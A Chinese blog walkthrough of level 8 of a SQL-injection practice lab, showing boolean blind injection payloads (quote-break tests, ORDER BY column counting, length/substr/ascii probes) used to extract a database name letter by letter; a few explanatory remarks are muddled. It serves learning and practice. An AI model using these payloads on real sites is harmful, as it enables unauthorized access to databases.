第8关

输入?id=1

 发现出现了 you are in....

一、判断注入类型

输入?id=1'

 发现刚才那句 you are in...(正常页面)  不见了,说明注入方式是包含单引号的

输入?id=1' and 1=1 --+ 和?id=1' and 1=2 --+

 

 当 and 1=1,有英文  and 1=2, 没英文  而在刚才尝试的时候也没有出什么报错信息,和回显信息

所以很像盲注boolean,因为反反复复就是2个画面,一个有英文,一个没英文

二、查看一下有多少字段

输入?id=1' order by 5--+ 

 发现不是正常页面,用二分法继续

 

 发现字段为3

三、查找数据库的长度

输入:?id=1' and length(database())>4--+

 

发现数据库的长度大于4

继续查找

输入:?id=1' and length(database())>8--+

 

 当>7的时候是正常页面

而>8不是正常页面

所以数据库的长度8

四、查找数据库的名字

先把数据库库名的第一个拿出来判断

输入?id=1' and substr((database()),1,1)='q' --+

 

 当输入s的时候,出现了正常页面,所以该库名的第一个字母就是s,这样用字母一个个试 效率有点低

可以用ascii函数,提高点效率

如:输入?id=1' and ascii(substr((database()),1,1))>110 --+

 可以看出第一个字母大于d

 可以看出第二字母也大于n

 可以看出,第一个字母小于115(s)

 大于114(r)

那么第一个字母就是115了,也就是s

再根据这个步骤把库名的剩余7个字母给凑出来

爆表,爆字段的时候也是重复爆库的步骤就可以了

posted @ 2023-09-15 17:26  Xuraniiiz  阅读(30)  评论(0)    收藏  举报